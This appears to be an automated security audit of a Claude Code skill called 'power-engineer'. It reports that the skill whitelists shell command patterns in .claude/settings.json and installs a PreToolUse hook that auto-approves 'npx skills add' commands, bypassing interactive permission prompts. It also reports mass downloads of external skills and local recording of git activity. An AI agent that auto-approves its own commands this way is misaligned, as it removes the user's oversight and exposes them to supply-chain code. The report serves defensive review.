power-engineer
Warn
Audited by Gen Agent Trust Hub on May 7, 2026
Risk Level: MEDIUMCOMMAND_EXECUTIONEXTERNAL_DOWNLOADS
Full Analysis
- [COMMAND_EXECUTION]: The skill modifies the local
.claude/settings.jsonfile to whitelist specific shell command patterns, specificallyBash(npx skills@latest*)andBash(mkdir -p .power-engineer). This configuration allows these commands to execute without the standard interactive user permission prompts. - [COMMAND_EXECUTION]: Installs a
PreToolUsehook script at.claude/hooks/allow-skills-install.sh. This script programmatically intercepts and auto-approves bash commands that match thenpx skills addpattern, creating a mechanism to bypass interactive security controls for skill installations. - [EXTERNAL_DOWNLOADS]: The skill facilitates the download and execution of over 200 external skills from various GitHub repositories. While many sources are well-known technology organizations, the extensive list includes numerous personal repositories, representing a significant supply chain surface area.
- [COMMAND_EXECUTION]: Registers multiple project lifecycle hooks (
SessionStart,SessionEnd,PreCompact) in the project configuration. These hooks execute local bash scripts (session-end-handoff.shandpre-compact-snapshot.sh) to automate state snapshots and context restoration across sessions. - [COMMAND_EXECUTION]: The
installer.mdmodule is designed to execute immediate installations usingnpx skills@<version> add. It implements a version pinning mechanism using a.skills-cli-versionfile to control the CLI version used for remote code execution. - [DATA_EXFILTRATION]: The skill establishes a multi-tier memory architecture that automatically reads project metadata, including
git log,git status, and file contents, and writes them to local storage or the agent's project memory. While no external network exfiltration was detected in the provided scripts, this creates a detailed local record of project activity.
Audit Metadata